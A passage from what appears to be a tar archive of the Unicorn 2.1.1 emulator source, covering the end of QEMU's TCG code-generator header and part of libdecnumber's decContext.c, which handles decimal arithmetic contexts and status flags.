TCG_OPF_64BIT = 0x10, /* Instruction is optional and not implemented by the host, or insn is generic and should not be implemened by the host. */ TCG_OPF_NOT_PRESENT = 0x20, /* Instruction operands are vectors. */ TCG_OPF_VECTOR = 0x40, }; typedef struct TCGOpDef { const char *name; uint8_t nb_oargs, nb_iargs, nb_cargs, nb_args; uint8_t flags; TCGArgConstraint *args_ct; int *sorted_args; #if defined(CONFIG_DEBUG_TCG) int used; #endif } TCGOpDef; typedef struct TCGTargetOpDef { TCGOpcode op; const char *args_ct_str[TCG_MAX_OP_ARGS]; } TCGTargetOpDef; #ifndef NDEBUG #define tcg_abort() \ do {\ fprintf(stderr, "%s:%d: tcg fatal error\n", __FILE__, __LINE__);\ abort();\ } while (0) #else #define tcg_abort() abort() #endif bool tcg_op_supported(TCGOpcode op); void tcg_gen_callN(TCGContext *tcg_ctx, void *func, TCGTemp *ret, int nargs, TCGTemp **args); TCGOp *tcg_emit_op(TCGContext *tcg_ctx, TCGOpcode opc); void tcg_op_remove(TCGContext *s, TCGOp *op); TCGOp *tcg_op_insert_before(TCGContext *s, TCGOp *op, TCGOpcode opc); TCGOp *tcg_op_insert_after(TCGContext *s, TCGOp *op, TCGOpcode opc); void tcg_optimize(TCGContext *s); TCGv_i32 tcg_const_i32(TCGContext *tcg_ctx, int32_t val); TCGv_i64 tcg_const_i64(TCGContext *tcg_ctx, int64_t val); TCGv_i32 tcg_const_local_i32(TCGContext *tcg_ctx, int32_t val); TCGv_i64 tcg_const_local_i64(TCGContext *tcg_ctx, int64_t val); TCGv_vec tcg_const_zeros_vec(TCGContext *tcg_ctx, TCGType); TCGv_vec tcg_const_ones_vec(TCGContext *tcg_ctx, TCGType); TCGv_vec tcg_const_zeros_vec_matching(TCGContext *tcg_ctx, TCGv_vec); TCGv_vec tcg_const_ones_vec_matching(TCGContext *tcg_ctx, TCGv_vec); #if UINTPTR_MAX == UINT32_MAX # define tcg_const_ptr(tcg_ctx, x) ((TCGv_ptr)tcg_const_i32(tcg_ctx, (intptr_t)(x))) # define tcg_const_local_ptr(tcg_ctx, x) ((TCGv_ptr)tcg_const_local_i32(tcg_ctx, (intptr_t)(x))) #else # define tcg_const_ptr(tcg_ctx, x) ((TCGv_ptr)tcg_const_i64(tcg_ctx, (intptr_t)(x))) # define tcg_const_local_ptr(tcg_ctx, x) ((TCGv_ptr)tcg_const_local_i64(tcg_ctx, (intptr_t)(x))) #endif TCGLabel *gen_new_label(TCGContext *tcg_ctx); /** * label_arg * @l: label * * Encode a label for storage in the TCG opcode stream. */ static inline TCGArg label_arg(TCGLabel *l) { return (uintptr_t)l; } /** * arg_label * @i: value * * The opposite of label_arg. Retrieve a label from the * encoding of the TCG opcode stream. */ static inline TCGLabel *arg_label(TCGArg i) { return (TCGLabel *)(uintptr_t)i; } /** * tcg_ptr_byte_diff * @a, @b: addresses to be differenced * * There are many places within the TCG backends where we need a byte * difference between two pointers. While this can be accomplished * with local casting, it's easy to get wrong -- especially if one is * concerned with the signedness of the result. * * This version relies on GCC's void pointer arithmetic to get the * correct result. */ static inline ptrdiff_t tcg_ptr_byte_diff(void *a, void *b) { return (char *)a - (char *)b; } /** * tcg_pcrel_diff * @s: the tcg context * @target: address of the target * * Produce a pc-relative difference, from the current code_ptr * to the destination address. */ static inline ptrdiff_t tcg_pcrel_diff(TCGContext *s, void *target) { return tcg_ptr_byte_diff(target, s->code_ptr); } /** * tcg_current_code_size * @s: the tcg context * * Compute the current code size within the translation block. * This is used to fill in qemu's data structures for goto_tb. */ static inline size_t tcg_current_code_size(TCGContext *s) { return tcg_ptr_byte_diff(s->code_ptr, s->code_buf); } /* Combine the MemOp and mmu_idx parameters into a single value. */ typedef uint32_t TCGMemOpIdx; /** * make_memop_idx * @op: memory operation * @idx: mmu index * * Encode these values into a single parameter. */ static inline TCGMemOpIdx make_memop_idx(MemOp op, unsigned idx) { tcg_debug_assert(idx <= 15); return (op << 4) | idx; } /** * get_memop * @oi: combined op/idx parameter * * Extract the memory operation from the combined value. */ static inline MemOp get_memop(TCGMemOpIdx oi) { return oi >> 4; } /** * get_mmuidx * @oi: combined op/idx parameter * * Extract the mmu index from the combined value. */ static inline unsigned get_mmuidx(TCGMemOpIdx oi) { return oi & 15; } /** * tcg_qemu_tb_exec: * @env: pointer to CPUArchState for the CPU * @tb_ptr: address of generated code for the TB to execute * * Start executing code from a given translation block. * Where translation blocks have been linked, execution * may proceed from the given TB into successive ones. * Control eventually returns only when some action is needed * from the top-level loop: either control must pass to a TB * which has not yet been directly linked, or an asynchronous * event such as an interrupt needs handling. * * Return: The return value is the value passed to the corresponding * tcg_gen_exit_tb() at translation time of the last TB attempted to execute. * The value is either zero or a 4-byte aligned pointer to that TB combined * with additional information in its two least significant bits. The * additional information is encoded as follows: * 0, 1: the link between this TB and the next is via the specified * TB index (0 or 1). That is, we left the TB via (the equivalent * of) "goto_tb <index>". The main loop uses this to determine * how to link the TB just executed to the next. * 2: we are using instruction counting code generation, and we * did not start executing this TB because the instruction counter * would hit zero midway through it. In this case the pointer * returned is the TB we were about to execute, and the caller must * arrange to execute the remaining count of instructions. * 3: we stopped because the CPU's exit_request flag was set * (usually meaning that there is an interrupt that needs to be * handled). The pointer returned is the TB we were about to execute * when we noticed the pending exit request. * * If the bottom two bits indicate an exit-via-index then the CPU * state is correctly synchronised and ready for execution of the next * TB (and in particular the guest PC is the address to execute next). * Otherwise, we gave up on execution of this TB before it started, and * the caller must fix up the CPU state by calling the CPU's * synchronize_from_tb() method with the TB pointer we return (falling * back to calling the CPU's set_pc method with tb->pb if no * synchronize_from_tb() method exists). * * Note that TCG targets may use a different definition of tcg_qemu_tb_exec * to this default (which just calls the prologue.code emitted by * tcg_target_qemu_prologue()). */ #define TB_EXIT_MASK 3 #define TB_EXIT_IDX0 0 #define TB_EXIT_IDX1 1 #define TB_EXIT_IDXMAX 1 #define TB_EXIT_REQUESTED 3 #ifdef HAVE_TCG_QEMU_TB_EXEC uintptr_t tcg_qemu_tb_exec(CPUArchState *env, uint8_t *tb_ptr); #else # define tcg_qemu_tb_exec(env, tb_ptr) \ ((uintptr_t (*)(void *, void *))env->uc->tcg_ctx->code_gen_prologue)(env, tb_ptr) #endif void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size); #if TCG_TARGET_MAYBE_vec /* Return zero if the tuple (opc, type, vece) is unsupportable; return > 0 if it is directly supportable; return < 0 if we must call tcg_expand_vec_op. */ int tcg_can_emit_vec_op(TCGContext *tcg_ctx, TCGOpcode, TCGType, unsigned); #else static inline int tcg_can_emit_vec_op(TCGContext *tcg_ctx, TCGOpcode o, TCGType t, unsigned ve) { return 0; } #endif /* Expand the tuple (opc, type, vece) on the given arguments. */ void tcg_expand_vec_op(TCGContext *tcg_ctx, TCGOpcode, TCGType, unsigned, TCGArg, ...); /* Replicate a constant C accoring to the log2 of the element size. */ uint64_t dup_const_func(unsigned vece, uint64_t c); #ifndef _MSC_VER #define dup_const(VECE, C) \ (__builtin_constant_p(VECE) \ ? ( (VECE) == MO_8 ? 0x0101010101010101ull * (uint8_t)(C) \ : (VECE) == MO_16 ? 0x0001000100010001ull * (uint16_t)(C) \ : (VECE) == MO_32 ? 0x0000000100000001ull * (uint32_t)(C) \ : dup_const_func(VECE, C)) \ : dup_const_func(VECE, C)) #else #define dup_const(VECE, C) dup_const_func(VECE, C) #endif /* * Memory helpers that will be used by TCG generated code. */ /* Value zero-extended to tcg register size. */ tcg_target_ulong helper_ret_ldub_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); tcg_target_ulong helper_le_lduw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); tcg_target_ulong helper_le_ldul_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); uint64_t helper_le_ldq_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); tcg_target_ulong helper_be_lduw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); tcg_target_ulong helper_be_ldul_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); uint64_t helper_be_ldq_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); /* Value sign-extended to tcg register size. */ tcg_target_ulong helper_ret_ldsb_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); tcg_target_ulong helper_le_ldsw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); tcg_target_ulong helper_le_ldsl_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); tcg_target_ulong helper_be_ldsw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); tcg_target_ulong helper_be_ldsl_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); void helper_ret_stb_mmu(CPUArchState *env, target_ulong addr, uint8_t val, TCGMemOpIdx oi, uintptr_t retaddr); void helper_le_stw_mmu(CPUArchState *env, target_ulong addr, uint16_t val, TCGMemOpIdx oi, uintptr_t retaddr); void helper_le_stl_mmu(CPUArchState *env, target_ulong addr, uint32_t val, TCGMemOpIdx oi, uintptr_t retaddr); void helper_le_stq_mmu(CPUArchState *env, target_ulong addr, uint64_t val, TCGMemOpIdx oi, uintptr_t retaddr); void helper_be_stw_mmu(CPUArchState *env, target_ulong addr, uint16_t val, TCGMemOpIdx oi, uintptr_t retaddr); void helper_be_stl_mmu(CPUArchState *env, target_ulong addr, uint32_t val, TCGMemOpIdx oi, uintptr_t retaddr); void helper_be_stq_mmu(CPUArchState *env, target_ulong addr, uint64_t val, TCGMemOpIdx oi, uintptr_t retaddr); /* Temporary aliases until backends are converted. */ #ifdef TARGET_WORDS_BIGENDIAN # define helper_ret_ldsw_mmu helper_be_ldsw_mmu # define helper_ret_lduw_mmu helper_be_lduw_mmu # define helper_ret_ldsl_mmu helper_be_ldsl_mmu # define helper_ret_ldul_mmu helper_be_ldul_mmu # define helper_ret_ldl_mmu helper_be_ldul_mmu # define helper_ret_ldq_mmu helper_be_ldq_mmu # define helper_ret_stw_mmu helper_be_stw_mmu # define helper_ret_stl_mmu helper_be_stl_mmu # define helper_ret_stq_mmu helper_be_stq_mmu #else # define helper_ret_ldsw_mmu helper_le_ldsw_mmu # define helper_ret_lduw_mmu helper_le_lduw_mmu # define helper_ret_ldsl_mmu helper_le_ldsl_mmu # define helper_ret_ldul_mmu helper_le_ldul_mmu # define helper_ret_ldl_mmu helper_le_ldul_mmu # define helper_ret_ldq_mmu helper_le_ldq_mmu # define helper_ret_stw_mmu helper_le_stw_mmu # define helper_ret_stl_mmu helper_le_stl_mmu # define helper_ret_stq_mmu helper_le_stq_mmu #endif uint32_t helper_atomic_cmpxchgb_mmu(CPUArchState *env, target_ulong addr, uint32_t cmpv, uint32_t newv, TCGMemOpIdx oi, uintptr_t retaddr); uint32_t helper_atomic_cmpxchgw_le_mmu(CPUArchState *env, target_ulong addr, uint32_t cmpv, uint32_t newv, TCGMemOpIdx oi, uintptr_t retaddr); uint32_t helper_atomic_cmpxchgl_le_mmu(CPUArchState *env, target_ulong addr, uint32_t cmpv, uint32_t newv, TCGMemOpIdx oi, uintptr_t retaddr); uint64_t helper_atomic_cmpxchgq_le_mmu(CPUArchState *env, target_ulong addr, uint64_t cmpv, uint64_t newv, TCGMemOpIdx oi, uintptr_t retaddr); uint32_t helper_atomic_cmpxchgw_be_mmu(CPUArchState *env, target_ulong addr, uint32_t cmpv, uint32_t newv, TCGMemOpIdx oi, uintptr_t retaddr); uint32_t helper_atomic_cmpxchgl_be_mmu(CPUArchState *env, target_ulong addr, uint32_t cmpv, uint32_t newv, TCGMemOpIdx oi, uintptr_t retaddr); uint64_t helper_atomic_cmpxchgq_be_mmu(CPUArchState *env, target_ulong addr, uint64_t cmpv, uint64_t newv, TCGMemOpIdx oi, uintptr_t retaddr); #define GEN_ATOMIC_HELPER(NAME, TYPE, SUFFIX) \ TYPE helper_atomic_ ## NAME ## SUFFIX ## _mmu \ (CPUArchState *env, target_ulong addr, TYPE val, \ TCGMemOpIdx oi, uintptr_t retaddr); #ifdef CONFIG_ATOMIC64 #define GEN_ATOMIC_HELPER_ALL(NAME) \ GEN_ATOMIC_HELPER(NAME, uint32_t, b) \ GEN_ATOMIC_HELPER(NAME, uint32_t, w_le) \ GEN_ATOMIC_HELPER(NAME, uint32_t, w_be) \ GEN_ATOMIC_HELPER(NAME, uint32_t, l_le) \ GEN_ATOMIC_HELPER(NAME, uint32_t, l_be) \ GEN_ATOMIC_HELPER(NAME, uint64_t, q_le) \ GEN_ATOMIC_HELPER(NAME, uint64_t, q_be) #else #define GEN_ATOMIC_HELPER_ALL(NAME) \ GEN_ATOMIC_HELPER(NAME, uint32_t, b) \ GEN_ATOMIC_HELPER(NAME, uint32_t, w_le) \ GEN_ATOMIC_HELPER(NAME, uint32_t, w_be) \ GEN_ATOMIC_HELPER(NAME, uint32_t, l_le) \ GEN_ATOMIC_HELPER(NAME, uint32_t, l_be) #endif GEN_ATOMIC_HELPER_ALL(fetch_add) GEN_ATOMIC_HELPER_ALL(fetch_sub) GEN_ATOMIC_HELPER_ALL(fetch_and) GEN_ATOMIC_HELPER_ALL(fetch_or) GEN_ATOMIC_HELPER_ALL(fetch_xor) GEN_ATOMIC_HELPER_ALL(fetch_smin) GEN_ATOMIC_HELPER_ALL(fetch_umin) GEN_ATOMIC_HELPER_ALL(fetch_smax) GEN_ATOMIC_HELPER_ALL(fetch_umax) GEN_ATOMIC_HELPER_ALL(add_fetch) GEN_ATOMIC_HELPER_ALL(sub_fetch) GEN_ATOMIC_HELPER_ALL(and_fetch) GEN_ATOMIC_HELPER_ALL(or_fetch) GEN_ATOMIC_HELPER_ALL(xor_fetch) GEN_ATOMIC_HELPER_ALL(smin_fetch) GEN_ATOMIC_HELPER_ALL(umin_fetch) GEN_ATOMIC_HELPER_ALL(smax_fetch) GEN_ATOMIC_HELPER_ALL(umax_fetch) GEN_ATOMIC_HELPER_ALL(xchg) #undef GEN_ATOMIC_HELPER_ALL #undef GEN_ATOMIC_HELPER /* * These aren't really a "proper" helpers because TCG cannot manage Int128. * However, use the same format as the others, for use by the backends. * * The cmpxchg functions are only defined if HAVE_CMPXCHG128; * the ld/st functions are only defined if HAVE_ATOMIC128, * as defined by <qemu/atomic128.h>. */ Int128 helper_atomic_cmpxchgo_le_mmu(CPUArchState *env, target_ulong addr, Int128 cmpv, Int128 newv, TCGMemOpIdx oi, uintptr_t retaddr); Int128 helper_atomic_cmpxchgo_be_mmu(CPUArchState *env, target_ulong addr, Int128 cmpv, Int128 newv, TCGMemOpIdx oi, uintptr_t retaddr); Int128 helper_atomic_ldo_le_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); Int128 helper_atomic_ldo_be_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); void helper_atomic_sto_le_mmu(CPUArchState *env, target_ulong addr, Int128 val, TCGMemOpIdx oi, uintptr_t retaddr); void helper_atomic_sto_be_mmu(CPUArchState *env, target_ulong addr, Int128 val, TCGMemOpIdx oi, uintptr_t retaddr); #ifdef CONFIG_DEBUG_TCG void tcg_assert_listed_vecop(TCGOpcode); #else static inline void tcg_assert_listed_vecop(TCGOpcode op) { } #endif static inline const TCGOpcode *tcg_swap_vecop_list(const TCGOpcode *n) { #ifdef CONFIG_DEBUG_TCG const TCGOpcode *o = tcg_ctx->vecop_list; tcg_ctx->vecop_list = n; return o; #else return NULL; #endif } bool tcg_can_emit_vecop_list(TCGContext *tcg_ctx, const TCGOpcode *, TCGType, unsigned); void check_exit_request(TCGContext *tcg_ctx); void tcg_dump_ops(TCGContext *s, bool have_prefs, const char *headline); struct jit_code_entry { struct jit_code_entry *next_entry; struct jit_code_entry *prev_entry; const void *symfile_addr; uint64_t symfile_size; }; void uc_del_inline_hook(uc_engine *uc, struct hook *hk); void uc_add_inline_hook(uc_engine *uc, struct hook *hk, void** args, int args_len); #endif /* TCG_H */ ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/libdecnumber/��������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016606�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/libdecnumber/decContext.c��������������������������������������������������������0000664�0000000�0000000�00000046524�14675241067�0021065�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Decimal context module for the decNumber C Library. Copyright (C) 2005, 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal Context module */ /* ------------------------------------------------------------------ */ /* This module comprises the routines for handling arithmetic */ /* context structures. */ /* ------------------------------------------------------------------ */ #include "qemu/osdep.h" #include "libdecnumber/dconfig.h" #include "libdecnumber/decContext.h" #include "libdecnumber/decNumberLocal.h" #if DECCHECK /* compile-time endian tester [assumes sizeof(Int)>1] */ static const Int mfcone=1; /* constant 1 */ static const Flag *mfctop=(Flag *)&mfcone; /* -> top byte */ #define LITEND *mfctop /* named flag; 1=little-endian */ #endif /* ------------------------------------------------------------------ */ /* round-for-reround digits */ /* ------------------------------------------------------------------ */ const uByte DECSTICKYTAB[10]={1,1,2,3,4,6,6,7,8,9}; /* used if sticky */ /* ------------------------------------------------------------------ */ /* Powers of ten (powers[n]==10**n, 0<=n<=9) */ /* ------------------------------------------------------------------ */ const uLong DECPOWERS[19] = {1, 10, 100, 1000, 10000, 100000, 1000000, 10000000, 100000000, 1000000000, 10000000000ULL, 100000000000ULL, 1000000000000ULL, 10000000000000ULL, 100000000000000ULL, 1000000000000000ULL, 10000000000000000ULL, 100000000000000000ULL, 1000000000000000000ULL, }; /* ------------------------------------------------------------------ */ /* decContextClearStatus -- clear bits in current status */ /* */ /* context is the context structure to be queried */ /* mask indicates the bits to be cleared (the status bit that */ /* corresponds to each 1 bit in the mask is cleared) */ /* returns context */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decContext *decContextClearStatus(decContext *context, uInt mask) { context->status&=~mask; return context; } /* decContextClearStatus */ /* ------------------------------------------------------------------ */ /* decContextDefault -- initialize a context structure */ /* */ /* context is the structure to be initialized */ /* kind selects the required set of default values, one of: */ /* DEC_INIT_BASE -- select ANSI X3-274 defaults */ /* DEC_INIT_DECIMAL32 -- select IEEE 754r defaults, 32-bit */ /* DEC_INIT_DECIMAL64 -- select IEEE 754r defaults, 64-bit */ /* DEC_INIT_DECIMAL128 -- select IEEE 754r defaults, 128-bit */ /* For any other value a valid context is returned, but with */ /* Invalid_operation set in the status field. */ /* returns a context structure with the appropriate initial values. */ /* ------------------------------------------------------------------ */ decContext * decContextDefault(decContext *context, Int kind) { /* set defaults... */ context->digits=9; /* 9 digits */ context->emax=DEC_MAX_EMAX; /* 9-digit exponents */ context->emin=DEC_MIN_EMIN; /* .. balanced */ context->round=DEC_ROUND_HALF_UP; /* 0.5 rises */ context->traps=DEC_Errors; /* all but informational */ context->status=0; /* cleared */ context->clamp=0; /* no clamping */ #if DECSUBSET context->extended=0; /* cleared */ #endif switch (kind) { case DEC_INIT_BASE: /* [use defaults] */ break; case DEC_INIT_DECIMAL32: context->digits=7; /* digits */ context->emax=96; /* Emax */ context->emin=-95; /* Emin */ context->round=DEC_ROUND_HALF_EVEN; /* 0.5 to nearest even */ context->traps=0; /* no traps set */ context->clamp=1; /* clamp exponents */ #if DECSUBSET context->extended=1; /* set */ #endif break; case DEC_INIT_DECIMAL64: context->digits=16; /* digits */ context->emax=384; /* Emax */ context->emin=-383; /* Emin */ context->round=DEC_ROUND_HALF_EVEN; /* 0.5 to nearest even */ context->traps=0; /* no traps set */ context->clamp=1; /* clamp exponents */ #if DECSUBSET context->extended=1; /* set */ #endif break; case DEC_INIT_DECIMAL128: context->digits=34; /* digits */ context->emax=6144; /* Emax */ context->emin=-6143; /* Emin */ context->round=DEC_ROUND_HALF_EVEN; /* 0.5 to nearest even */ context->traps=0; /* no traps set */ context->clamp=1; /* clamp exponents */ #if DECSUBSET context->extended=1; /* set */ #endif break; default: /* invalid Kind */ /* use defaults, and .. */ decContextSetStatus(context, DEC_Invalid_operation); /* trap */ } #if DECCHECK if (LITEND!=DECLITEND) { const char *adj; if (LITEND) adj="little"; else adj="big"; printf("Warning: DECLITEND is set to %d, but this computer appears to be %s-endian\n", DECLITEND, adj); } #endif return context;} /* decContextDefault */ /* ------------------------------------------------------------------ */ /* decContextGetRounding -- return current rounding mode */ /* */ /* context is the context structure to be queried */ /* returns the rounding mode */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ enum rounding decContextGetRounding(decContext *context) { return context->round; } /* decContextGetRounding */ /* ------------------------------------------------------------------ */ /* decContextGetStatus -- return current status */ /* */ /* context is the context structure to be queried */ /* returns status */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ uInt decContextGetStatus(decContext *context) { return context->status; } /* decContextGetStatus */ /* ------------------------------------------------------------------ */ /* decContextRestoreStatus -- restore bits in current status */ /* */ /* context is the context structure to be updated */ /* newstatus is the source for the bits to be restored */ /* mask indicates the bits to be restored (the status bit that */ /* corresponds to each 1 bit in the mask is set to the value of */ /* the corresponding bit in newstatus) */ /* returns context */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decContext *decContextRestoreStatus(decContext *context, uInt newstatus, uInt mask) { context->status&=~mask; /* clear the selected bits */ context->status|=(mask&newstatus); /* or in the new bits */ return context; } /* decContextRestoreStatus */ /* ------------------------------------------------------------------ */ /* decContextSaveStatus -- save bits in current status */ /* */ /* context is the context structure to be queried */ /* mask indicates the bits to be saved (the status bits that */ /* correspond to each 1 bit in the mask are saved) */ /* returns the AND of the mask and the current status */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ uInt decContextSaveStatus(decContext *context, uInt mask) { return context->status&mask; } /* decContextSaveStatus */ /* ------------------------------------------------------------------ */ /* decContextSetRounding -- set current rounding mode */ /* */ /* context is the context structure to be updated */ /* newround is the value which will replace the current mode */ /* returns context */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decContext *decContextSetRounding(decContext *context, enum rounding newround) { context->round=newround; return context; } /* decContextSetRounding */ /* ------------------------------------------------------------------ */ /* decContextSetStatus -- set status and raise trap if appropriate */ /* */ /* context is the context structure to be updated */ /* status is the DEC_ exception code */ /* returns the context structure */ /* */ /* Control may never return from this routine, if there is a signal */ /* handler and it takes a long jump. */ /* ------------------------------------------------------------------ */ decContext * decContextSetStatus(decContext *context, uInt status) { context->status|=status; if (status & context->traps) raise(SIGFPE); return context;} /* decContextSetStatus */ /* ------------------------------------------------------------------ */ /* decContextSetStatusFromString -- set status from a string + trap */ /* */ /* context is the context structure to be updated */ /* string is a string exactly equal to one that might be returned */ /* by decContextStatusToString */ /* */ /* The status bit corresponding to the string is set, and a trap */ /* is raised if appropriate. */ /* */ /* returns the context structure, unless the string is equal to */ /* DEC_Condition_MU or is not recognized. In these cases NULL is */ /* returned. */ /* ------------------------------------------------------------------ */ decContext * decContextSetStatusFromString(decContext *context, const char *string) { if (strcmp(string, DEC_Condition_CS)==0) return decContextSetStatus(context, DEC_Conversion_syntax); if (strcmp(string, DEC_Condition_DZ)==0) return decContextSetStatus(context, DEC_Division_by_zero); if (strcmp(string, DEC_Condition_DI)==0) return decContextSetStatus(context, DEC_Division_impossible); if (strcmp(string, DEC_Condition_DU)==0) return decContextSetStatus(context, DEC_Division_undefined); if (strcmp(string, DEC_Condition_IE)==0) return decContextSetStatus(context, DEC_Inexact); if (strcmp(string, DEC_Condition_IS)==0) return decContextSetStatus(context, DEC_Insufficient_storage); if (strcmp(string, DEC_Condition_IC)==0) return decContextSetStatus(context, DEC_Invalid_context); if (strcmp(string, DEC_Condition_IO)==0) return decContextSetStatus(context, DEC_Invalid_operation); #if DECSUBSET if (strcmp(string, DEC_Condition_LD)==0) return decContextSetStatus(context, DEC_Lost_digits); #endif if (strcmp(string, DEC_Condition_OV)==0) return decContextSetStatus(context, DEC_Overflow); if (strcmp(string, DEC_Condition_PA)==0) return decContextSetStatus(context, DEC_Clamped); if (strcmp(string, DEC_Condition_RO)==0) return decContextSetStatus(context, DEC_Rounded); if (strcmp(string, DEC_Condition_SU)==0) return decContextSetStatus(context, DEC_Subnormal); if (strcmp(string, DEC_Condition_UN)==0) return decContextSetStatus(context, DEC_Underflow); if (strcmp(string, DEC_Condition_ZE)==0) return context; return NULL; /* Multiple status, or unknown */ } /* decContextSetStatusFromString */ /* ------------------------------------------------------------------ */ /* decContextSetStatusFromStringQuiet -- set status from a string */ /* */ /* context is the context structure to be updated */ /* string is a string exactly equal to one that might be returned */ /* by decContextStatusToString */ /* */ /* The status bit corresponding to the string is set; no trap is */ /* raised. */ /* */ /* returns the context structure, unless the string is equal to */ /* DEC_Condition_MU or is not recognized. In these cases NULL is */ /* returned. */ /* ------------------------------------------------------------------ */ decContext * decContextSetStatusFromStringQuiet(decContext *context, const char *string) { if (strcmp(string, DEC_Condition_CS)==0) return decContextSetStatusQuiet(context, DEC_Conversion_syntax); if (strcmp(string, DEC_Condition_DZ)==0) return decContextSetStatusQuiet(context, DEC_Division_by_zero); if (strcmp(string, DEC_Condition_DI)==0) return decContextSetStatusQuiet(context, DEC_Division_impossible); if (strcmp(string, DEC_Condition_DU)==0) return decContextSetStatusQuiet(context, DEC_Division_undefined); if (strcmp(string, DEC_Condition_IE)==0) return decContextSetStatusQuiet(context, DEC_Inexact); if (strcmp(string, DEC_Condition_IS)==0) return decContextSetStatusQuiet(context, DEC_Insufficient_storage); if (strcmp(string, DEC_Condition_IC)==0) return decContextSetStatusQuiet(context, DEC_Invalid_context); if (strcmp(string, DEC_Condition_IO)==0) return decContextSetStatusQuiet(context, DEC_Invalid_operation); #if DECSUBSET if (strcmp(string, DEC_Condition_LD)==0) return decContextSetStatusQuiet(context, DEC_Lost_digits); #endif if (strcmp(string, DEC_Condition_OV)==0) return decContextSetStatusQuiet(context, DEC_Overflow); if (strcmp(string, DEC_Condition_PA)==0) return decContextSetStatusQuiet(context, DEC_Clamped); if (strcmp(string, DEC_Condition_RO)==0) return decContextSetStatusQuiet(context, DEC_Rounded); if (strcmp(string, DEC_Condition_SU)==0) return decContextSetStatusQuiet(context, DEC_Subnormal); if (strcmp(string, DEC_Condition_UN)==0) return decContextSetStatusQuiet(context, DEC_Underflow); if (strcmp(string, DEC_Condition_ZE)==0) return context; return NULL; /* Multiple status, or unknown */ } /* decContextSetStatusFromStringQuiet */ /* ------------------------------------------------------------------ */ /* decContextSetStatusQuiet -- set status without trap */ /* */ /* context is the context structure to be updated */ /* status is the DEC_ exception code */ /* returns the context structure */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decContext * decContextSetStatusQuiet(decContext *context, uInt status) { context->status|=status; return context;} /* decContextSetStatusQuiet */ /* ------------------------------------------------------------------ */ /* decContextStatusToString -- convert status flags to a string */ /* */ /* context is a context with valid status field */ /* */ /* returns a constant string describing the condition. If multiple */ /* (or no) flags are set, a generic constant message is returned. */ /* ------------------------------------------------------------------ */ const char *decContextStatusToString(const decContext *context) { Int status=context->status; /* test the five IEEE first, as some of the others are ambiguous when */ /* DECEXTFLAG=0 */ if (status==DEC_Invalid_operation ) return DEC_Condition_IO; if (status==DEC_Division_by_zero ) return DEC_Condition_DZ; if (status==DEC_Overflow ) return DEC_Condition_OV; if (status==DEC_Underflow ) return DEC_Condition_UN; if (status==DEC_Inexact ) return DEC_Condition_IE; if (status==DEC_Division_impossible ) return DEC_Condition_DI; if (status==DEC_Division_undefined ) return DEC_Condition_DU; if (status==DEC_Rounded ) return DEC_Condition_RO; if (status==DEC_Clamped ) return DEC_Condition_PA; if (status==DEC_Subnormal ) return DEC_Condition_SU; if (status==DEC_Conversion_syntax ) return DEC_Condition_CS; if (status==DEC_Insufficient_storage ) return DEC_Condition_IS; if (status==DEC_Invalid_context ) return DEC_Condition_IC; #if DECSUBSET if (status==DEC_Lost_digits ) return DEC_Condition_LD; #endif if (status==0 ) return DEC_Condition_ZE; return DEC_Condition_MU; /* Multiple errors */ } /* decContextStatusToString */ /* ------------------------------------------------------------------ */ /* decContextTestSavedStatus -- test bits in saved status */ /* */ /* oldstatus is the status word to be tested */ /* mask indicates the bits to be tested (the oldstatus bits that */ /* correspond to each 1 bit in the mask are tested) */ /* returns 1 if any of the tested bits are 1, or 0 otherwise */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ uInt decContextTestSavedStatus(uInt oldstatus, uInt mask) { return 